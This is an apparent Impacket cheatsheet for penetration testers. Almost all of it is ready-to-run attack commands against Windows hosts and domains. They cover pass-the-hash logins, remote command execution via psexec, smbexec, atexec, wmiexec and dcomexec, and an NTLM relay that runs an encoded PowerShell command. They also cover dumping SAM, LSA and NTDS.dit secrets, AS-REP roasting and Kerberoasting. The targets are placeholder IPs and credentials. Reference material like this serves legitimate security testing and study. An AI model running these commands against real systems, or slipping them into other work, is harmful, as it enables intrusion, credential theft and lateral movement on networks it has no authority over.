Impacket Cheatsheet
Collection of Python tools for working with network protocols (SMB, MSRPC, etc.).
Authentication Format
All tools use the same authentication format:
[[domain/]username[:password]@]<target>
Examples:
administrator:Password123@10.10.10.10DOMAIN/admin:Password123@10.10.10.10admin@10.10.10.10(prompts for password)
Pass-the-Hash
Use -hashes with format LMHASH:NTHASH:
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10
impacket-psexec
Remote command execution using RemComSvc.
Interactive Shell
impacket-psexec administrator:'Password123'@10.10.10.10
Execute Command
impacket-psexec administrator:'Password123'@10.10.10.10 'whoami'
Domain Account
impacket-psexec DOMAIN/admin:'Password123'@10.10.10.10
Pass-the-Hash
impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10
impacket-smbexec
Similar to psexec but doesn’t upload binary. Uses local SMB server for output.
Interactive Shell
impacket-smbexec administrator:'Password123'@10.10.10.10
With Share
impacket-smbexec -share ADMIN$ administrator:'Password123'@10.10.10.10
impacket-atexec
Execute commands via Task Scheduler service.
Execute Command
impacket-atexec administrator:'Password123'@10.10.10.10 'whoami'
Pass-the-Hash
impacket-atexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10 'ipconfig'
impacket-wmiexec
Execute commands via WMI.
Interactive Shell
impacket-wmiexec administrator:'Password123'@10.10.10.10
Execute Command
impacket-wmiexec administrator:'Password123'@10.10.10.10 'whoami'
impacket-dcomexec
Execute commands via DCOM.
impacket-dcomexec administrator:'Password123'@10.10.10.10
impacket-ntlmrelayx
NTLM relay attack tool.
Basic Relay (Dump SAM)
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10
Relay with Command Execution
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10 -c 'powershell -e <BASE64>'
Relay to Multiple Targets
impacket-ntlmrelayx --no-http-server -smb2support -tf targets.txt
Options
| Option | Description |
|---|---|
-t TARGET | Single target |
-tf FILE | Targets file |
-smb2support | Enable SMB2 support |
--no-http-server | Disable HTTP server |
-c CMD | Command to execute |
-e FILE | Execute file |
-w | Watch for incoming connections |
--remove-mic | Remove MIC (CVE-2019-1040) |
impacket-secretsdump
Dump secrets from SAM, LSA, and NTDS.dit.
Local SAM Dump
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Remote Dump
impacket-secretsdump administrator:'Password123'@10.10.10.10
Dump NTDS (Domain Controller)
impacket-secretsdump -just-dc administrator:'Password123'@dc01.domain.local
Just NTLM Hashes
impacket-secretsdump -just-dc-ntlm administrator:'Password123'@dc01.domain.local
impacket-smbclient
SMB client similar to smbclient.
impacket-smbclient administrator:'Password123'@10.10.10.10
Commands: shares, use, ls, cd, get, put, cat
impacket-smbserver
Create a local SMB server.
Basic Server
impacket-smbserver share /path/to/share
With SMB2 Support
impacket-smbserver share /path/to/share -smb2support
With Authentication
impacket-smbserver share /path/to/share -username user -password pass
impacket-GetNPUsers
AS-REP Roasting - get TGT for users with “Do not require Kerberos preauthentication”.
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -no-pass -dc-ip 10.10.10.10
impacket-GetUserSPNs
Kerberoasting - get service tickets for cracking.
impacket-GetUserSPNs DOMAIN/user:'Password123' -dc-ip 10.10.10.10 -request
Common Options
| Option | Description |
|---|---|
-hashes LMHASH:NTHASH | Use NTLM hashes |
-no-pass | Don’t ask for password |
-k | Use Kerberos authentication |
-dc-ip IP | Domain controller IP |
-target-ip IP | Target IP (if hostname used) |
-debug | Enable debug output |